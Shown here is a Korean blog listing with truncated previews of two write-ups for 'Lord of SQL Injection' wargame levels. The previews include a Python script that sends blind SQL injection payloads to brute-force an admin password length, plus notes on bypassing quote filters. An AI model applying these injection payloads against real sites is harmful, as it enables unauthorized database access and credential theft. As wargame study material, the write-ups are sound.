webhacking/load of sql injection
-
[load of sql injection] orgewebhacking/load of sql injection 2018. 11. 17. 00:33
Solve code:import requests url = "https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php"list1 = [] cookies = { 'PHPSESSID' : 'uu98um35otu07audr4q491v6j3' } for i in range(1,100): ## 패스워드 길이 찾기 text = "1' || length(pw) = "+str(i)+" && id = 'admin" params = { 'pw' : text} res = requests.get( url, params = params, cookies = cookies ) if( 'Hello admin' in res.text ): print(res.text) b..
-
[load of sql injection] goblinwebhacking/load of sql injection 2018. 11. 15. 15:49
id 부분에 변수 값이 아닌 'guest'로 지정을 한 문제이다.mysqli_fetch_array 반환 한 값을 가진 id변수가 admin이면 문제가 풀린다.싱글쿼터 ' 더블쿼터 " "prob"문자열 모두 필터링이 된다.그래서 필자가 처음에 생각했던 방법인 union select * from prob_goblin where id = 'admin' 은 수행되지 않고 필터링 된다.Db 테이블을 머릿속으로 생각해보면서 1 guest 2 admin 이렇게 2개의 데이터와 순서로 되있을거라 추측했다.그래서 결과순서를 order by로 거꾸로 하였더니 풀렸다.* db table을 추측하는 것도 필요하다.* and를 끝내면 or 로 모두 출력이 된다.* 문자열은 쿼터로 묶어주어야한다, "admin", 'admin'*..